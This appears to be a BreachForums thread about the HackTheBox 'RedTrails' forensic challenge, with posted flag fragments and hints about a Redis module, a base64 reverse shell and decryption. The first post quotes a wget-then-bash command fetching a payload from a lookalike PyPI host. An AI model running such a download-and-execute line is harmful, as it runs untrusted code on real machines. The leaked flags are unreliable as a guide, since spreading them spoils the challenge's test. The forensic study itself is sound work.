JOIN BREACHFORUMS TELEGRAM
redtrails forensic challenge
by yolocalman - Sunday August 11, 2024 at 06:49 PM
Breached
Member
Posts: 16
Threads: 2
Joined: Jul 2024
Reputation: 2
#1
Aug 11, 2024, 06:49 PM
I have found the following 2/3 parts of the flag:

_c0uld_0p3n_n3w

HTB{r3d15_1n574nc35

But cant find the final one, I think that it is the output of the command: wget --no-check-certificate -O gezsdSC8i3 'https://files.pypi-install.com/packages/gezsdSC8i3' && bash gezsdSC8i3

Can somebody help me to find the final part?
Reply
Elite User

Posts: 148
Threads: 2
Joined: Oct 2023
Reputation: 25
#2
Aug 11, 2024, 07:58 PM
Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the tcp stream almost at the beginning, bulkstring, array and somewhere around that place.
Second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated then decrypt the second part is hidden behind the encrypted string.
Third part is the trickiest, yes. Trace the TCP streams, you will find 3 hexadecimal strings which seems like the output of redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an elf header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.
Reply
Breached
Member
Posts: 16
Threads: 2
Joined: Jul 2024
Reputation: 2
#3
Aug 11, 2024, 09:56 PM (This post was last modified: Aug 11, 2024, 10:16 PM by yolocalman.)
(Aug 11, 2024, 07:58 PM)peRd1 Wrote: Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the tcp stream almost at the beginning, bulkstring, array and somewhere around that place.
Second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated then decrypt the second part is hidden behind the encrypted string.
Third part is the trickiest, yes. Trace the TCP streams, you will find 3 hexadecimal strings which seems like the output of redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an elf header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.

Hey perd1 thanks for the reply and the tips! I will give you rep! Smile
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,485 Yesterday, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 394 Yesterday, 10:36 PM
Last Post: op334
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 369 91,957 Yesterday, 04:10 PM
Last Post: sabbyahmed
  CBBH Write Ups hiddenhacker 22 6,223 Yesterday, 06:39 AM
Last Post: Usercomplex
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 86 7,808 Apr 28, 2026, 11:39 PM
Last Post: my4ri0d0

Forum Jump:


 Users browsing this forum: 1 Guest(s)